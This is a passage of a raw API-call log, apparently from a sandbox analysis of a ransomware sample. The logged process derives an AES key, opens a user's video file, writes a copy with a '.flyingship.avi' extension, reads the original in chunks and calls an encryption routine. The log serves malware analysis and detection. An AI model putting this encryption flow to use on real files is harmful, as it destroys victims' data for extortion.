cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.959] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0196.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.959] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0196.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.959] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.959] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.959] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.959] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0196.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.959] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.960] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.960] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0196.960] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.960] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.960] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0196.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.974] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.974] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.974] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0196.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.974] CryptDestroyHash (hHash=0x90af58) returned 1 [0196.974] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.974] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.974] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.975] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.975] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\c5jup_nf8xpmtrun_.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0196.975] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.975] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.976] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0196.976] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0196.976] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0196.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0196.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0196.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0196.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0196.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0196.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0196.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0196.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0196.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0196.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0196.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0196.978] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo")) returned 0x10 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0196.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0196.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0196.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0196.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\c5jup_nf8xpmtrun_.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0196.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0196.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0196.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0196.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0196.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.980] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0196.980] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0196.980] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0196.980] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0196.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0196.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0196.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0196.981] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0196.981] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0196.985] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x2c9, lpOverlapped=0x0) returned 1 [0196.985] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0196.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0196.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0196.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0196.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x102c9) returned 0xbea018 [0196.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0196.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0196.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0196.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0196.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x102c9) returned 0xbfa2f0 [0196.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.988] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x102c9) returned 0xbea018 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.988] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0196.988] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.988] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0196.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x102c9) returned 0xbea018 [0196.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0196.989] RtlAllocateHeap (HeapHandle=0x8a0000, 